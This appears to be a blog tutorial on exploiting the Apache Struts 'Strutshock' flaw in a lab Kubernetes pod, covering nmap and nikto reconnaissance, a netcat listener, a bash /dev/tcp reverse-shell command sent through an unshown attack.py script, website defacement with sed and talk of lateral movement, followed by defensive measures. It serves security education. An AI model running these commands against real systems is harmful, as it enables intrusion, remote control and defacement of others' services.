zgtangqian.com

How to Exploit a Vulnerability in Containerized Websites

Written on

Understanding the Exploit Process

This guide outlines the method of exploiting a vulnerability in a web application hosted as a container, along with protective measures to mitigate such attacks. While many resources illustrate how to compromise a Kubernetes cluster or a container orchestrator post-compromise, few delve into the initial hacking process of a secured application behind a firewall.

The goal here is to demonstrate how an attacker can exploit a flaw in a web application to access a pod running in Kubernetes. These tactics are applicable across various container platforms, allowing us to better secure our applications against similar threats.

The Objective

Typically, web applications are protected by firewalls and various security measures, making direct access challenging. However, outbound firewall rules tend to be less strict, allowing applications to connect to the internet. We will leverage this to conduct our attack.

  1. Remote Code Execution (RCE)
  2. Establishing a Reverse Shell
  3. Causing Disruption

Initially, we will establish RCE on the target machine to execute commands. Subsequently, we will craft a command to initiate a reverse shell back to our attacking machine, as outbound connections are usually permitted by firewalls.

Setting Up the Target Application

Our target will be a Java-based web application utilizing the Apache Struts framework, hosted within a local Kubernetes cluster on Docker Desktop. The procedures described here are applicable regardless of the container hosting method.

To deploy the vulnerable Java web application, execute:

kubectl apply -f vulnerable-pod.yaml

Access the application via: [http://localhost:30004/](http://localhost:30004/).

Configuring the Attack Server

We will employ a Kali Linux container for our attack, which is a widely-used distribution equipped with numerous hacking tools. Set up your attack server with the following commands:

docker run --name kali --rm -it kalilinux/kali-rolling /bin/bash

apt-get update && apt-get install -y curl nmap nikto python3 nano dnsutils

Conducting Attack Reconnaissance

The initial phase of an attack involves reconnaissance to gather information about the target's technology stack, which aids in determining effective attack vectors.

Commonly used security testing tools can help scan for vulnerabilities. For instance, Nmap is essential for scanning network ranges to identify open ports and exposed services:

nmap -sT -p "80,135,443,445,30000-30100" host.docker.internal

Typically, port 80 should be open, while other ports may not provide significant insights. If SSH or RDP ports are accessible, cracking credentials could lead to a successful breach.

Identifying Vulnerabilities with Nikto

Nikto serves as a web security scanner to identify misconfigurations or vulnerabilities within the target application:

nikto -host host.docker.internal:30004

Here, we may uncover several security issues, including the Strutshock vulnerability. This flaw allows arbitrary code execution via crafted HTTP headers due to improper handling during file-upload attempts.

Steps for Exploiting the Vulnerability

Recognizing that our target is vulnerable to RCE, we will create a web request that directs back to our attacking server. The process involves listening for inbound connections on port 443, which is generally allowed by firewalls.

The crafted web request will include a malicious Content-Type header, which the Apache Struts application will mishandle, executing the injected code that connects back to our server.

Creating a Command and Control Server

To facilitate communication with our target, we will set up a Command and Control (C2) server:

docker run --name commandcontrol --rm -it -p 443:443 ubuntu /bin/bash

apt-get update && apt-get install -y ncat

Using Netcat on the C2 server, we can listen for incoming connections from the target application.

nc -lnvp 443

Establishing the Reverse Shell

A Python script can be utilized to form a malicious web request and send it to the target. The following command will initiate a reverse shell connection:

python3 attack.py http://host.docker.internal:30004/ "bash -i >& /dev/tcp/host.docker.internal/443 0>&1"

Upon successfully connecting, we can execute commands on the target through our C2 server.

Exploring the Compromised Target

With the target compromised, we can explore various options, including:

  • Deploying malware
  • Creating a C2 server within the target's network
  • Lateral movement across the cluster
  • Modifying website content

Modifying the Target Website

To demonstrate, we can alter a file in the Tomcat server to change the displayed message on the website:

cd /usr/local/tomcat/webapps/ROOT

sed -i 's/Welcome!/You have been Hacked!/g' showcase.jsp

After executing this command, any visitors to the website will notice the change.

Lateral Movement in the Kubernetes Cluster

Being aware that the target runs within a Kubernetes cluster, we can utilize kubectl to explore other pods and services, potentially gaining access to sensitive information.

Protecting Against Future Attacks

While this overview may be alarming, there are numerous defensive measures that can be implemented to prevent such attacks. The platform used to host your containers plays a crucial role in security.

#### Key Defense Strategies

  1. Vulnerability Scanning: Utilize tools like Snyk or Aqua to regularly scan for vulnerabilities.
  2. Policy Enforcement: Use policy agents to prevent running containers as root.
  3. Web Application Firewalls (WAF): Implement WAFs to block malicious HTTP requests.
  4. Network Policies: Limit outbound traffic to prevent unauthorized connections.
  5. Service Mesh: Employ solutions like Istio to enhance network security.
  6. Runtime Monitoring: Utilize tools to monitor for suspicious activities and respond accordingly.
  7. Least Privilege Principle: Ensure applications have only the necessary permissions to minimize potential damage.

This guide aims to provide insights into potential vulnerabilities within your applications, allowing for better protective measures against evolving threats. For those interested in hands-on practice, a complete guide is available on my GitHub.

Chapter 2: Video Tutorials

The first video titled "Hacking into your containers, and how to stop it!" provides an overview of vulnerabilities in containerized applications and defensive strategies.

The second video, "Learn to HACK for FREE using DOCKER containers (homelab)," offers practical insights into setting up a hacking environment using Docker.

Share the page:

Twitter Facebook Reddit LinkIn

-----------------------

Recent Post:

Harnessing ChatGPT as Your Virtual Intern: A Guide for Writers

Discover how to effectively use ChatGPT as a virtual intern to enhance your writing process and productivity.

Three Key Elements for a Successful Product Launch

Discover three crucial features that can elevate your digital business and enhance your product launch success.

Mark Cuban's Bold Aspirations: The Future of Media Ownership

Mark Cuban’s ambitions to buy Fox News and X highlight his vision for a more balanced media landscape. Explore the challenges and implications of these aspirations.

The Detective's Mindset in Software Development

Exploring the parallels between detective work and software development through various professions.

Essential Strategies for New Writers: Insights from My Initial Two Months on Medium

Discover key strategies for new writers based on two months of experience on Medium. Gain insights to enhance your writing journey.

Navigating Medium's Evolving Engagement Landscape: A Reflection

A reflection on declining views and engagement on Medium and the quest for understanding.

# Understanding the Challenges Gifted Boys Face in Education

Explore the unique struggles gifted boys encounter in educational settings and insights from experts on how to support them effectively.

The Xylitol Controversy: Is Peter Attia Wrong About New Research?

Exploring the debate surrounding xylitol's risks as highlighted by recent research and Peter Attia's dismissal of it.